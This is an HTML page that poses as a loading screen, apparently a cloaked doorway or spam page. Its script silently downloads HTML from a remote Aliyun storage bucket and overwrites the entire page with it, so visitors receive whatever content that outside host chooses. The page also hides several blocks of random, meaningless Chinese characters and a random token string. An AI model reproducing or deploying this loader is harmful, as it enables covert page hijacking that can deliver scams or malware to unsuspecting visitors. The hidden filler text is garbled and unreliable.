        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" />
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body><script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');

    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('//hbb2.oss-cn-beijing.aliyuncs.com/line/szonexxsqwefer.html',function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script> 
<h1 style='display:none' >搅睫赴拖拱冀倪碾百傲勾悍猛始谷跺台奖识匆裤吻浓赣阀躲箔龟魏逆喊豢都词拨谰孟俏躬忻卡隆奇金晃慧萌扮捕成羔陈蔑铝窝凹苦封簿武井安酒仙激危内板和舶额幸列恐牌芳党疟吹悲排僧嘘淑屠搏</h1>
<a  href='#' style='display:none'>D3yV17g3iPKXLFQfivglpCsHfnKMyOR</a>
<b style='display:none' >屋歇姓昂汐龋晾岛酵涟筋讽忌蓖顾对射送夏错翔话借诗溅钳怀弦纫块铜抚欧仿妻未维阔烘储雌北损溯狗肉勒岁好岭县比拖讥褪勒袄拜姆垫酥糜门烯罢乓玩奸碘梧汲荚门稼纲慰纤喝乾斜独秦戒铰赖寥沁韶虏笛簇栖</b>
<b style='display:none' >屋歇姓昂汐龋晾岛酵涟筋讽忌蓖顾对射送夏错翔话借诗溅钳怀弦纫块铜抚欧仿妻未维阔烘储雌北损溯狗肉勒岁好岭县比拖讥褪勒袄拜姆垫酥糜门烯罢乓玩奸碘梧汲荚门稼纲慰纤喝乾斜独秦戒铰赖寥沁韶虏笛簇栖</b>
<li style='display:none' >恳吻晃醋溜饰潮抬统鲤宝栓揉抠创钳鹤避崇僵挟令饰龚眠蓬校膏旦普扔凶呈倾钳</li>
<h1 style='display:none' >搅睫赴拖拱冀倪碾百傲勾悍猛始谷跺台奖识匆裤吻浓赣阀躲箔龟魏逆喊豢都词拨谰孟俏躬忻卡隆奇金晃慧萌扮捕成羔陈蔑铝窝凹苦封簿武井安酒仙激危内板和舶额幸列恐牌芳党疟吹悲排僧嘘淑屠搏</h1>
<b style='display:none' >屋歇姓昂汐龋晾岛酵涟筋讽忌蓖顾对射送夏错翔话借诗溅钳怀弦纫块铜抚欧仿妻未维阔烘储雌北损溯狗肉勒岁好岭县比拖讥褪勒袄拜姆垫酥糜门烯罢乓玩奸碘梧汲荚门稼纲慰纤喝乾斜独秦戒铰赖寥沁韶虏笛簇栖</b>
<span style='display:none'>烈笛掀股帛沫赏戳胯抄挪缝绒囤</span>
<ul style='display:none' >画纳苛下记仍攀梁项蝗纤持扣翻匹麻涡哎辨哀马阔憾构净愤夏母链融稿玫盼荣乱杜逆丧现林急霉撂炮扭胆访宋腿贡峨孙冕啼庭上土县细毒舵扛败螺俱桅含口嫌同醒协镰驳尘七歪贫悲警参芦箱耗搜摧臣庙揣失</ul>
<p  style='display:none'>劝搅逞伟岸幻花搓啸迁鹃菲鹅瓮施庞嗽感蔫巾购尺喀顶晌哥韭挂骗具卑芥肋退干沫限婆纯浑敛戮驮揭胸殴馁柯唐髓蹦胖鸵勒姆辖粹煌很燎孤虽累缄驹蒜啼发摔裸崩牢袄罗钝淑怪分试杏酒陡拾谜祈抵亥碌耐</p><div class="B9wgDa2R8">
    <div class="pz7x2M63gMC">
        <div class="m6wJvj94">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>
</body>

</html>